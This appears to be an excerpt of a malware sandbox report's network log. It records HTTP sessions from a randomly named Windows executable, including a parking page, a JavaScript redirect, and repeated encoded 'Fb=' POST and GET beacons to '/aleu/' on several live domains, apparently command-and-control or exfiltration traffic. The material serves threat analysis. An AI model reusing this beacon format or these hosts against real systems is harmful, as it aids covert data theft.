                            Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 [TRUNCATED]
                            Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA [TRUNCATED]
                            May 14, 2024 12:51:47.904444933 CEST1289INData Raw: 54 45 52 4d 49 4e 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41
                            Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
                            May 14, 2024 12:51:47.904495001 CEST1289INData Raw: 20 70 72 6f 66 65 73 69 6f 6e 61 6c 3c 2f 61 3e 20 63 6f 6e 20 74 75 20 6e 6f 6d 62 72 65 20 64 65 20 64 6f 6d 69 6e 69 6f 20 64 65 73 64 65 20 63 75 61 6c 71 75 69 65 72 20 64 69 73 70 6f 73 69 74 69 76 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
                            May 14, 2024 12:51:47.904623985 CEST1289INData Raw: 20 4f 6e 6c 69 6e 65 22 3e 54 69 65 6e 64 61 20 4f 6e 6c 69 6e 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                            May 14, 2024 12:51:47.904643059 CEST1289INData Raw: 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 76 70 73 22 20 74 69 74 6c 65 3d 22 53 65 72 76 69 64 6f 72 20 56 50 53 22 3e 73 65 72 76 69 64 6f 72 20 56 50 53 3c 2f 61 3e 3a 20 70 6f 74 65 6e 63 69 61 20 79 20 72 65 6e 64 69 6d 69 65 6e 74 6f 20 63 6f 6e
                            Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
                            May 14, 2024 12:51:47.904656887 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6f 6c 75 63 69 6f 6e 65 73 20 61 20 4d 65 64 69 64 61 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 65 6e 73 61 6e 64 6f 20 65 6e 20 63 61 64 61 20 63 6c 69 65 6e
                            Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
                            May 14, 2024 12:51:47.904670954 CEST360INData Raw: 63 74 6f 72 28 27 6c 61 62 65 6c 5b 66 6f 72 3d 64 6f 6d 5d 27 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 2b 20 64 6f 6d 61 69 6e 53 65 61 72 63 68 54 65 78 74 5b 64 6f 6d 61 69 6e 53 65 61 72 63 68 43 68 61 72 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
                            May 14, 2024 12:51:47.904685020 CEST5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.104972852.175.38.24803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:54.044508934 CEST16INHTTP/1.1 200 OK
                            Data Raw:
                            Data Ascii:
                            May 14, 2024 12:51:54.044534922 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                            Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://wnucetgswsjvfbno.app" + "?p="+window.location.pathname + window.location.search.replace(


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.104972952.175.38.24803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:56.881869078 CEST16INHTTP/1.1 200 OK
                            Data Raw:
                            Data Ascii:
                            May 14, 2024 12:51:56.881896019 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                            Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://wnucetgswsjvfbno.app" + "?p="+window.location.pathname + window.location.search.replace(


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.104973052.175.38.24803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:59.722137928 CEST16INHTTP/1.1 200 OK
                            Data Raw:
                            Data Ascii:
                            May 14, 2024 12:51:59.722168922 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                            Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://wnucetgswsjvfbno.app" + "?p="+window.location.pathname + window.location.search.replace(


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.104973152.175.38.24803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:02.574865103 CEST16INHTTP/1.1 200 OK
                            Data Raw:
                            Data Ascii:
                            May 14, 2024 12:52:02.574887991 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                            Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://wnucetgswsjvfbno.app" + "?p="+window.location.pathname + window.location.search.replace(
                            May 14, 2024 12:52:09.976089001 CEST6OUTData Raw: 47
                            Data Ascii: G
                            May 14, 2024 12:52:22.773607969 CEST6OUTData Raw: 45
                            Data Ascii: E


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.1049732178.211.137.59803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:08.434066057 CEST745OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.skibinscy-finanse.pl
                            Origin: http://www.skibinscy-finanse.pl
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.skibinscy-finanse.pl/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 49 66 6f 62 61 79 72 79 62 49 2f 65 6d 76 70 70 4f 30 78 31 78 64 39 38 32 56 6e 73 59 4c 2b 78 33 57 61 73 41 75 71 54 6f 4b 6a 37 6e 41 36 36 57 4d 4c 4a 61 6d 32 46 79 71 7a 73 4a 4a 78 76 64 77 75 7a 30 69 59 69 56 39 47 77 65 76 63 44 4d 34 58 65 63 49 41 67 4b 44 48 78 47 52 42 6e 6e 2b 36 4c 6a 32 56 54 50 39 35 38 4f 78 67 71 62 32 54 69 6a 75 62 36 4d 39 57 42 6c 72 4e 30 51 52 6c 39 65 61 44 4a 4c 51 49 68 4d 65 4e 66 41 43 2f 68 63 45 6a 71 66 6e 44 32 4f 34 74 4d 71 76 37 74 32 42 7a 6d 2b 76 6c 66 74 70 4a 69
                            Data Ascii: Fb=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hcEjqfnD2O4tMqv7t2Bzm+vlftpJi
                            May 14, 2024 12:52:08.760406971 CEST360INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:08 GMT
                            Server: Apache
                            Content-Length: 196
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.1049733178.211.137.59803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:11.292457104 CEST769OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.skibinscy-finanse.pl
                            Origin: http://www.skibinscy-finanse.pl
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.skibinscy-finanse.pl/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 75 78 33 33 71 73 53 73 43 54 76 4b 6a 37 67 77 36 37 53 4d 4c 30 61 6d 71 72 79 72 66 73 4a 4e 5a 76 64 78 2b 7a 30 31 45 6a 56 74 47 32 57 50 63 37 42 59 58 65 63 49 41 67 4b 44 43 6d 47 52 35 6e 6d 4e 53 4c 69 54 70 51 52 4e 35 39 50 78 67 71 52 57 54 6d 6a 75 62 49 4d 2f 6a 55 6c 70 46 30 51 54 39 39 65 4c 44 47 42 51 49 6e 49 65 4d 54 47 53 58 78 5a 56 4c 75 61 48 6e 6d 53 4f 74 58 6b 75 61 71 6e 51 53 78 74 59 35 52 6a 76 38 49 63 55 2f 6a 45 58 63 75 52 51 33 50 78 4e 50 64 79 2f 30 4a 68 51 3d 3d
                            Data Ascii: Fb=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtY5Rjv8IcU/jEXcuRQ3PxNPdy/0JhQ==
                            May 14, 2024 12:52:11.619638920 CEST360INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:11 GMT
                            Server: Apache
                            Content-Length: 196
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.1049734178.211.137.59803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:15.328545094 CEST1782OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.skibinscy-finanse.pl
                            Origin: http://www.skibinscy-finanse.pl
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.skibinscy-finanse.pl/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 6d 78 33 46 79 73 41 4e 43 54 75 4b 6a 37 76 67 36 41 53 4d 4c 54 61 6d 79 76 79 71 6a 38 4a 50 68 76 53 7a 6d 7a 67 51 77 6a 4d 64 47 32 55 50 63 41 4d 34 57 63 63 49 77 6b 4b 44 79 6d 47 52 35 6e 6d 4c 75 4c 30 32 56 51 54 4e 35 38 4f 78 67 6d 62 32 54 4b 6a 75 43 39 4d 2f 6d 76 6c 5a 6c 30 54 7a 74 39 53 5a 72 47 62 51 49 6c 50 65 4e 4f 47 53 4b 32 5a 56 58 59 61 48 54 4d 53 4a 5a 58 6b 6f 54 73 6a 52 43 68 76 59 64 30 69 4d 56 6a 4d 53 2f 6f 43 6d 56 34 58 79 6a 39 73 73 43 71 37 50 74 62 33 66 73 33 64 56 62 71 5a 37 70 50 78 55 34 47 55 4d 45 43 63 67 42 4c 52 4b 43 57 49 2b 64 79 48 6f 59 4a 2f 43 74 6f 71 37 72 57 35 45 68 72 38 54 50 79 45 42 30 33 37 78 5a 4d 35 4c 65 65 37 67 59 39 52 61 58 69 4f 72 46 79 55 7a 4f 66 52 65 53 6d 36 68 46 55 4c 70 4b 55 6d 33 6c 35 5a 43 6c 39 44 57 62 46 48 57 73 70 41 4f 2f 74 4b 44 6e 64 57 6b 32 61 64 55 74 30 61 4c 31 [TRUNCATED]
                            Data Ascii: Fb=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+mx3FysANCTuKj7vg6ASMLTamyvyqj8JPhvSzmzgQwjMdG2UPcAM4WccIwkKDymGR5nmLuL02VQTN58Oxgmb2TKjuC9M/mvlZl0Tzt9SZrGbQIlPeNOGSK2ZVXYaHTMSJZXkoTsjRChvYd0iMVjMS/oCmV4Xyj9ssCq7Ptb3fs3dVbqZ7pPxU4GUMECcgBLRKCWI+dyHoYJ/Ctoq7rW5Ehr8TPyEB037xZM5Lee7gY9RaXiOrFyUzOfReSm6hFULpKUm3l5ZCl9DWbFHWspAO/tKDndWk2adUt0aL1dUJzAp/Yf3UwMGJy2nFp4hAOJepkzGLKfyJ4TUXxPboIrFFX/SfZv1lpT7ncBcARIxYXFVUjPt1Yx7L8G4gzstBsNWXAY3+NA+PFkbpDJaXACG2PkIjkJX7fgN1zvY39RcwyEO4gtt49eO/1ObH+LNY5i6sVVj8lZUbaizUUlac1ubL0qldaE8AEZL2RBEwUoEhm13ypy86uZuu3ImbOQDnUm+zp70oWtHW6Hnh3oZArssK+bMRtz8draxfinxfwFQxs8qFzpx3vLYTrUMWJ1YgdquvFNfGrlPzCrpLke8OeHHB3a7ZNzRx2PVCAqeoLMR0cngNPu4dRFygkHfE1HOq6hKEPIwPmyWF1z2o63BDFZkqLUxBn+FPsiNo8TliXcRfOkq7YZBJs5ZjVBCC767UItnMI5uIsP6K6yD9CB5o4GM4UsFF0eb1clVnp6d7gnaMSFvXH3LR20T/TuFmOZc8JIS38W91SD0rqtiWD0JnxoWOyMMefqr11mUQvabF9kbLJ5P2Mtnqpztr5IVD+EljJPnefohp8maREeA4vdKVIvf5w0E9FyAK0y3qvgMw7nGPaIqDz1M5il6mARcU2XI3/pdzV/i6+pZ6dZT+IJqdnzmWXI6y8qByLYuSrfuXkPqWj/ZzG8BJOUMnA6dO+RIjQIzEVIt0Cnt [TRUNCATED]
                            May 14, 2024 12:52:15.654952049 CEST360INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:15 GMT
                            Server: Apache
                            Content-Length: 196
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.1049735178.211.137.59803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:18.192090034 CEST470OUTGET /aleu/?Fb=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sM/a7W8oScpDHK4wfMzjdXHtYm8Gz2g==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.skibinscy-finanse.pl
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:52:18.528799057 CEST360INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:18 GMT
                            Server: Apache
                            Content-Length: 196
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.1049736203.161.46.103803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:52:33.437197924 CEST724OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.fairmarty.top
                            Origin: http://www.fairmarty.top
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.fairmarty.top/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 4c 77 4a 39 45 44 4e 48 6c 4b 36 58 68 55 37 41 6b 41 33 37 43 58 75 48 48 38 79 44 79 62 49 6c 31 38 34 38 51 4d 34 4b 67 43 67 63 66 62 43 7a 46 6e 59 55 58 6e 50 66 54 30 48 71 54 58 49 52 46 62 31 2b 64 76 2b 63 4b 66 5a 48 51 4a 4d 31 48 71 42 4e 71 4f 64 75 38 6f 57 76 64 6a 53 63 62 4e 68 61 74 79 6c 5a 63 67 67 44 6d 72 48 67 34 61 44 74 6f 4b 56 4e 74 33 59 6a 56 4d 4e 69 72 4e 6c 61 33 2b 54 6d 4a 47 4c 59 58 62 31 46 72 51 7a 68 44 4d 6a 35 62 6b 35 4f 78 51 30 37 72 6d 54 61 45 44 71 32 72 71 5a 30 78 77 4b 38
                            Data Ascii: Fb=4GbMTgr0j9lSLwJ9EDNHlK6XhU7AkA37CXuHH8yDybIl1848QM4KgCgcfbCzFnYUXnPfT0HqTXIRFb1+dv+cKfZHQJM1HqBNqOdu8oWvdjScbNhatylZcggDmrHg4aDtoKVNt3YjVMNirNla3+TmJGLYXb1FrQzhDMj5bk5OxQ07rmTaEDq2rqZ0xwK8
                            May 14, 2024 12:52:34.968383074 CEST533INHTTP/1.1 404 Not Found
                            Date: Tue, 14 May 2024 10:52:33 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
